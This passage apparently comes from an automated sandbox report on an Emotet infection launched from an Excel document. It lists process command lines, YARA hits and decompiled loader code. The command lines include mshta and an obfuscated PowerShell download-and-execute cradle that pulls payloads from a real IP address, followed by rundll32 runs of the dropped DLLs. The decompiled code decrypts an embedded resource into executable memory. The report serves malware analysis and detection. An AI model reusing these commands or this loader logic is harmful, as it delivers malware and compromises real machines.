                                                                                                                                  2022-01-28 20:04:55 UTC367INData Raw: e8 f7 9a d1 e5 18 2c 0f 3b 75 1f cb c4 ed 47 b9 06 8a e6 fe 1d 5a 96 9b 00 ce 53 4b 0f c1 0d c0 bd a1 9e cc 2c dc 86 80 c9 68 d3 94 4b 88 04 3e 1f c7 ec 46 48 8e e4 a1 49 79 d4 1e 6b 3a d7 87 6b 69 ef 22 31 94 6b d4 d8 97 dd 18 02 99 77 26 a5 e6 cc 9b 8e ef 75 c1 b6 d2 df e6 66 c3 ad 5c ec ce a3 44 f2 a2 36 46 fa 78 77 44 f4 b7 d4 a5 9c 28 45 4e 6c e8 2b d0 41 0c 00 c0 14 c2 94 b4 90 03 e3 14 01 73 e0 78 21 47 54 e0 d2 36 f6 fe d7 f1 a6 e0 c6 a8 77 22 4f 1a 28 40 39 8e da 39 08 8a 26 9e ab bb 9c 81 46 88 fb 5f 56 d7 a2 97 ab 3b 0a b3 18 9a ff 88 35 db 2c 0e bf 7e 8f 0f 90 01 f8 1d 14 98 ee 28 06 24 0b fe 51 5f 24 b1 4e c6 11 39 d0 65 b3 7e 30 a3 4d 3a 38 3b 08 6f 49 f7 b2 69 3e e9 87 aa 49 04 97 bc c0 25 05 02 e6 11 61 71 97 d3 2c db ba d5 59 2a dd b5 a5
                                                                                                                                  Data Ascii: ,;uGZSK,hK>FHIyk:ki"1kw&uf\D6FxwD(ENl+Asx!GT6w"O(@99&F_V;5,~($Q_$N9e~0M:8;oIi>I%aq,Y*
                                                                                                                                  2022-01-28 20:04:55 UTC375INData Raw: d5 cc 83 6d 40 42 eb cf 52 4c d7 32 e3 9c de 8d 3b 39 96 1b 4a bf d3 d8 78 5a 2d 5b bc cf aa 5e 27 5b bc 0b 6f 60 e2 6a 09 5a a4 7c 5f 08 fe 2c 21 bc f2 f9 e5 05 c1 37 48 80 2b 14 4a 85 f5 70 d5 12 1c 56 cb 17 d6 f0 82 ba f2 85 b5 8a ad e4 ef a2 00 3a 67 01 d8 51 01 21 2c be d6 a9 f2 24 26 c6 38 f3 d4 c1 50 9b 9c cd b1 33 3d ad 3b da ad e9 72 76 5f 45 03 93 6b 4e 0c 6d bc 27 34 c4 36 5a fc 76 79 be 0a 0d 1d 78 6b aa 3d cc f6 8f 9c 04 a3 12 46 ee fa 05 35 1c 72 7f f3 78 17 f1 ae 3b a1 c3 af fa 1f 97 17 66 8c b5 0d 7d 44 3a 86 64 59 13 7f 16 49 69 ef 97 66 f4 50 4b 89 ef 3b 62 5a 34 2c 27 a8 bb df d0 19 9e 0a a8 6a 8f dd 7a ba 3c 1d ad f2 9e 4b 47 f0 52 d1 50 84 27 cf 4b da 6c 0f 7b 5f 63 03 e3 2b 86 6f b3 98 55 04 11 0f a1 65 f7 64 20 b5 8b 60 07 bd 0e f0
                                                                                                                                  Data Ascii: m@BRL2;9JxZ-[^'[o`jZ|_,!7H+JpV:gQ!,$&8P3=;rv_EkNm'46Zvyxk=F5rx;f}D:dYIifPK;bZ4,'jz<KGRP'Kl{_c+oUed `



                                                                                                                                  Target ID:0
                                                                                                                                  Start time:21:04:17
                                                                                                                                  Start date:28/01/2022
                                                                                                                                  Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                                                                                                  Imagebase:0x13f460000
                                                                                                                                  File size:28253536 bytes
                                                                                                                                  MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high

                                                                                                                                  Target ID:2
                                                                                                                                  Start time:21:04:21
                                                                                                                                  Start date:28/01/2022
                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:cmd /c mshta http://91.240.118.168/zqqw/zaas/fe.html
                                                                                                                                  Imagebase:0x4aaf0000
                                                                                                                                  File size:345088 bytes
                                                                                                                                  MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high

                                                                                                                                  Target ID:4
                                                                                                                                  Start time:21:04:22
                                                                                                                                  Start date:28/01/2022
                                                                                                                                  Path:C:\Windows\System32\mshta.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:mshta http://91.240.118.168/zqqw/zaas/fe.html
                                                                                                                                  Imagebase:0x13fe10000
                                                                                                                                  File size:13824 bytes
                                                                                                                                  MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high

                                                                                                                                  Target ID:6
                                                                                                                                  Start time:21:04:24
                                                                                                                                  Start date:28/01/2022
                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/zqqw/zaas/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
                                                                                                                                  Imagebase:0x13f1d0000
                                                                                                                                  File size:473600 bytes
                                                                                                                                  MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                                  Reputation:high

                                                                                                                                  Target ID:8
                                                                                                                                  Start time:21:04:41
                                                                                                                                  Start date:28/01/2022
                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:"C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll BBDD
                                                                                                                                  Imagebase:0x4a6f0000
                                                                                                                                  File size:345088 bytes
                                                                                                                                  MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high

                                                                                                                                  Target ID:9
                                                                                                                                  Start time:21:04:41
                                                                                                                                  Start date:28/01/2022
                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll BBDD
                                                                                                                                  Imagebase:0x170000
                                                                                                                                  File size:44544 bytes
                                                                                                                                  MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.464757421.0000000000290000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  Reputation:high

                                                                                                                                  Target ID:10
                                                                                                                                  Start time:21:04:45
                                                                                                                                  Start date:28/01/2022
                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer
                                                                                                                                  Imagebase:0x170000
                                                                                                                                  File size:44544 bytes
                                                                                                                                  MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Author: Joe Security
                                                                                                                                  Reputation:high

                                                                                                                                  Target ID:11
                                                                                                                                  Start time:21:05:07
                                                                                                                                  Start date:28/01/2022
                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vnljigstknrhjwnk\pagi.wrr",GtcFgrxeupAr
                                                                                                                                  Imagebase:0x170000
                                                                                                                                  File size:44544 bytes
                                                                                                                                  MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.526646791.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.526815635.0000000000261000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.527063809.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                                  Reputation:high

                                                                                                                                  Target ID:12
                                                                                                                                  Start time:21:05:13
                                                                                                                                  Start date:28/01/2022
                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vnljigstknrhjwnk\pagi.wrr",DllRegisterServer
                                                                                                                                  Imagebase:0x170000
                                                                                                                                  File size:44544 bytes
                                                                                                                                  MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Author: Joe Security
                                                                                                                                  Reputation:high

                                                                                                                                  Target ID:14
                                                                                                                                  Start time:21:05:34
                                                                                                                                  Start date:28/01/2022
                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Qglmgufuicllvuzt\zdvyw.osp",fdhAQGhe
                                                                                                                                  Imagebase:0x170000
                                                                                                                                  File size:44544 bytes
                                                                                                                                  MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.580780340.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.581619652.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.580991991.0000000000241000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security

                                                                                                                                  Target ID:15
                                                                                                                                  Start time:21:05:38
                                                                                                                                  Start date:28/01/2022
                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Qglmgufuicllvuzt\zdvyw.osp",DllRegisterServer
                                                                                                                                  Imagebase:0x170000
                                                                                                                                  File size:44544 bytes
                                                                                                                                  MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Author: Joe Security

                                                                                                                                  Target ID:16
                                                                                                                                  Start time:21:05:58
                                                                                                                                  Start date:28/01/2022
                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Kwvpkzxruoppyhz\jflthedjndgf.dni",MzSrktOhCbVh
                                                                                                                                  Imagebase:0x170000
                                                                                                                                  File size:44544 bytes
                                                                                                                                  MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.649782159.0000000000211000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.650185514.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.649670122.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security

                                                                                                                                  Target ID:17
                                                                                                                                  Start time:21:06:11
                                                                                                                                  Start date:28/01/2022
                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Kwvpkzxruoppyhz\jflthedjndgf.dni",DllRegisterServer
                                                                                                                                  Imagebase:0x170000
                                                                                                                                  File size:44544 bytes
                                                                                                                                  MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.674984852.0000000000761000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.675100735.00000000007F0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.674911093.0000000000710000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.675173904.0000000000821000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.675036629.00000000007C1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.675503420.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.675011000.0000000000790000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000003.418851392.0000000002920000.00000010.00000800.00020000.00000000.sdmp, Offset: 02921000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_3_2920000_mshta.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 88
                                                                                                                                    • API String ID: 0-1845789810
                                                                                                                                    • Opcode ID: 10b8dfdc2f73abb514f2d7ddda6d37af5747ff5baf0ecddbed0ad67dd86991d8
                                                                                                                                    • Instruction ID: 03195254dd1fb841f166d406578cfad5c2a7eeea5229816f4ccc4ea2cdb0ecfa
                                                                                                                                    • Opcode Fuzzy Hash: 10b8dfdc2f73abb514f2d7ddda6d37af5747ff5baf0ecddbed0ad67dd86991d8
                                                                                                                                    • Instruction Fuzzy Hash: 7CD12630A1CA984FDB5ADB2C8454724BBE1FF59344F1444AEE88ECB29BDA20CC95C795
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000003.418851392.0000000002920000.00000010.00000800.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_3_2920000_mshta.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 88
                                                                                                                                    • API String ID: 0-1845789810
                                                                                                                                    • Opcode ID: 10b8dfdc2f73abb514f2d7ddda6d37af5747ff5baf0ecddbed0ad67dd86991d8
                                                                                                                                    • Instruction ID: 03195254dd1fb841f166d406578cfad5c2a7eeea5229816f4ccc4ea2cdb0ecfa
                                                                                                                                    • Opcode Fuzzy Hash: 10b8dfdc2f73abb514f2d7ddda6d37af5747ff5baf0ecddbed0ad67dd86991d8
                                                                                                                                    • Instruction Fuzzy Hash: 7CD12630A1CA984FDB5ADB2C8454724BBE1FF59344F1444AEE88ECB29BDA20CC95C795
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000003.418909077.0000000002370000.00000010.00000800.00020000.00000000.sdmp, Offset: 02370000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_3_2370000_mshta.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: cdf766ebdf63f29eb655a8b6811b704ac0ea3f39d36262ce071792e212be1600
                                                                                                                                    • Instruction ID: 3c2708f39e08455c05ead4d5a7d95bb5e775b35bc7c749f35cfe8b6800a26e86
                                                                                                                                    • Opcode Fuzzy Hash: cdf766ebdf63f29eb655a8b6811b704ac0ea3f39d36262ce071792e212be1600
                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.683510378.000007FF00280000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FF00280000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_7ff00280000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 3cff74b75f742daab288f8833116792d000d6f71c040ac526a43e851a5e64472
                                                                                                                                    • Instruction ID: 2f8ae2075e97e8dafea24fdca19be1a80b3c874c39f2d80712adcd5a6cef66b2
                                                                                                                                    • Opcode Fuzzy Hash: 3cff74b75f742daab288f8833116792d000d6f71c040ac526a43e851a5e64472
                                                                                                                                    • Instruction Fuzzy Hash: 0341AD2060EBC60FE7535778586A7A07FB0EF17210F0A00EBD488CB0A3D9589959C362
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.683510378.000007FF00280000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FF00280000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_7ff00280000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 0ab8388bb993b8766c573e1941374b7d73584e8dfee874aca440d1715006f1a5
                                                                                                                                    • Instruction ID: 21f5ba7f091968acb905ef9720406babec241dae963acc0e05542efea46b61a1
                                                                                                                                    • Opcode Fuzzy Hash: 0ab8388bb993b8766c573e1941374b7d73584e8dfee874aca440d1715006f1a5
                                                                                                                                    • Instruction Fuzzy Hash: 2F311F6190E7C24FE747577858AA6A07FB0AF13210F0E04EBC488CF0A3E45C898AC762
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Execution Graph

                                                                                                                                    Execution Coverage:16.1%
                                                                                                                                    Dynamic/Decrypted Code Coverage:16.2%
                                                                                                                                    Signature Coverage:21.9%
                                                                                                                                    Total number of Nodes:297
                                                                                                                                    Total number of Limit Nodes:23

                                                                                                                                    Control-flow Graph

                                                                                                                                    C-Code - Quality: 89%
                                                                                                                                    			E100125C0(void* __ebx, void* __edi, void* __esi, void* __eflags, struct HINSTANCE__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                    				void* _v8;
                                                                                                                                    				void* _v12;
                                                                                                                                    				intOrPtr _v16;
                                                                                                                                    				signed int _v20;
                                                                                                                                    				short _v22;
                                                                                                                                    				short _v24;
                                                                                                                                    				short _v26;
                                                                                                                                    				short _v28;
                                                                                                                                    				short _v30;
                                                                                                                                    				short _v32;
                                                                                                                                    				short _v34;
                                                                                                                                    				short _v36;
                                                                                                                                    				short _v38;
                                                                                                                                    				char _v40;
                                                                                                                                    				void* _v44;
                                                                                                                                    				void* _v48;
                                                                                                                                    				long _v52;
                                                                                                                                    				void* _v56;
                                                                                                                                    				struct HRSRC__* _v60;
                                                                                                                                    				short _v64;
                                                                                                                                    				short _v66;
                                                                                                                                    				short _v68;
                                                                                                                                    				short _v70;
                                                                                                                                    				short _v72;
                                                                                                                                    				short _v74;
                                                                                                                                    				short _v76;
                                                                                                                                    				short _v78;
                                                                                                                                    				short _v80;
                                                                                                                                    				short _v82;
                                                                                                                                    				short _v84;
                                                                                                                                    				short _v86;
                                                                                                                                    				char _v88;
                                                                                                                                    				intOrPtr _v92;
                                                                                                                                    				void* __ebp;
                                                                                                                                    				signed int _t66;
                                                                                                                                    				void* _t70;
                                                                                                                                    				void* _t72;
                                                                                                                                    				struct HRSRC__* _t74;
                                                                                                                                    				void* _t78;
                                                                                                                                    				intOrPtr _t92;
                                                                                                                                    				void* _t93;
                                                                                                                                    				void* _t95;
                                                                                                                                    				intOrPtr _t104;
                                                                                                                                    				signed int _t120;
                                                                                                                                    				void* _t121;
                                                                                                                                    
                                                                                                                                    				_t119 = __esi;
                                                                                                                                    				_t118 = __edi;
                                                                                                                                    				_t96 = __ebx;
                                                                                                                                    				_t66 =  *0x100545cc; // 0x67083a02
                                                                                                                                    				_v20 = _t66 ^ _t120;
                                                                                                                                    				_v92 = _a8;
                                                                                                                                    				 *0x10055a80 = _a4;
                                                                                                                                    				_t109 = _a8;
                                                                                                                                    				 *0x10055a84 = _a8;
                                                                                                                                    				 *0x10055a88 = _a12;
                                                                                                                                    				_v8 = 0;
                                                                                                                                    				_v52 = 0;
                                                                                                                                    				_v44 = 0;
                                                                                                                                    				_v48 = 0;
                                                                                                                                    				_v12 = 0;
                                                                                                                                    				_t70 = E10006A90(__eflags); // executed
                                                                                                                                    				_t131 = _t70;
                                                                                                                                    				if(_t70 != 0) {
                                                                                                                                    					_push(0x10046758);
                                                                                                                                    					E1002FE65(__ebx, _t109, __edi, __esi, __eflags);
                                                                                                                                    					_t72 = 0;
                                                                                                                                    				} else {
                                                                                                                                    					 *0x100530b8 = 0;
                                                                                                                                    					 *0x100530bc = 0;
                                                                                                                                    					 *0x100530c0 = 0;
                                                                                                                                    					 *0x100530c8 = 0;
                                                                                                                                    					 *0x100530c4 = 0;
                                                                                                                                    					 *0x100530cc = 0;
                                                                                                                                    					_v60 = 0;
                                                                                                                                    					_v56 = 0;
                                                                                                                                    					_t74 = FindResourceW(_a4, 0x1705, L"DASHBOARD"); // executed
                                                                                                                                    					_v60 = _t74;
                                                                                                                                    					_v56 = LoadResource(_a4, _v60);
                                                                                                                                    					_v52 = SizeofResource(_a4, _v60);
                                                                                                                                    					_v88 = 0x6b;
                                                                                                                                    					_v86 = 0x65;
                                                                                                                                    					_v84 = 0x72;
                                                                                                                                    					_v82 = 0x6e;
                                                                                                                                    					_v80 = 0x65;
                                                                                                                                    					_v78 = 0x6c;
                                                                                                                                    					_v76 = 0x33;
                                                                                                                                    					_v74 = 0x32;
                                                                                                                                    					_v72 = 0x2e;
                                                                                                                                    					_v70 = 0x64;
                                                                                                                                    					_v68 = 0x6c;
                                                                                                                                    					_v66 = 0x6c;
                                                                                                                                    					_v64 = 0;
                                                                                                                                    					_v40 = 0x6e;
                                                                                                                                    					_v38 = 0x74;
                                                                                                                                    					_v36 = 0x64;
                                                                                                                                    					_v34 = 0x6c;
                                                                                                                                    					_v32 = 0x6c;
                                                                                                                                    					_v30 = 0x2e;
                                                                                                                                    					_v28 = 0x64;
                                                                                                                                    					_v26 = 0x6c;
                                                                                                                                    					_v24 = 0x6c;
                                                                                                                                    					_v22 = 0;
                                                                                                                                    					_t78 = E10006A90(_t131); // executed
                                                                                                                                    					if(_t78 == 0) {
                                                                                                                                    						_t45 =  &_v88; // 0x6b
                                                                                                                                    						_t95 = E100048E0(_t45);
                                                                                                                                    						_t121 = _t121 + 4;
                                                                                                                                    						_v44 = _t95;
                                                                                                                                    					}
                                                                                                                                    					_t47 =  &_v40; // 0x6e
                                                                                                                                    					_v48 = E100048E0(_t47);
                                                                                                                                    					 *0x10055a7c = E100053D0(_v44, 0x6c705b40);
                                                                                                                                    					 *0x10055a78 = E100053D0(_v44, 0x531ff383);
                                                                                                                                    					_t133 =  *0x10055a78;
                                                                                                                                    					if( *0x10055a78 == 0) {
                                                                                                                                    						__eflags = 0x2000;
                                                                                                                                    						_v12 = VirtualAlloc(0, _v52, 0x00002000 -  *0x100530cc | 0x00001000, 0x40);
                                                                                                                                    					} else {
                                                                                                                                    						_t93 =  *0x10055a78(0xffffffff, 0, _v52, 0x3000, 0x40, 0); // executed
                                                                                                                                    						_v12 = _t93;
                                                                                                                                    					}
                                                                                                                                    					E1002FB00(_t96, _t118, _t119, _v12, _v56, _v52);
                                                                                                                                    					_t104 =  *0x100530b4; // 0x2795
                                                                                                                                    					_v16 = E1002F9A6(_t96, _v56, _t118, _t119, _t104);
                                                                                                                                    					E10002970(_t133, _v16, "6p2Z6a6CZ&M>ZR$a@Y$xnQ?<XBeh<22mz&0", 0x24);
                                                                                                                                    					_t109 = _v16;
                                                                                                                                    					E10003EE0(_v16, _v12, _v52);
                                                                                                                                    					_t92 = E100026A0(0x10055a64, _v12, _v52); // executed
                                                                                                                                    					 *0x10055a8c = _t92;
                                                                                                                                    					_t72 = 1;
                                                                                                                                    				}
                                                                                                                                    				return E1002F81E(_t72, _t96, _v20 ^ _t120, _t109, _t118, _t119);
                                                                                                                                    			}

















































                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 10006A90: _malloc.LIBCMT ref: 10006A9C
                                                                                                                                    • _printf.LIBCMT ref: 1001265F
                                                                                                                                    • FindResourceW.KERNEL32(00000000,00001705,DASHBOARD), ref: 1001268A
                                                                                                                                    • LoadResource.KERNEL32(00000000,00000000), ref: 1001269B
                                                                                                                                    • SizeofResource.KERNEL32(00000000,00000000), ref: 100126AC
                                                                                                                                    • VirtualAllocExNuma.KERNELBASE(000000FF,00000000,00000000,00003000,00000040,00000000), ref: 100127AC
                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,00000000,-100510CC,00000040), ref: 100127D1
                                                                                                                                    • _malloc.LIBCMT ref: 100127F5
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
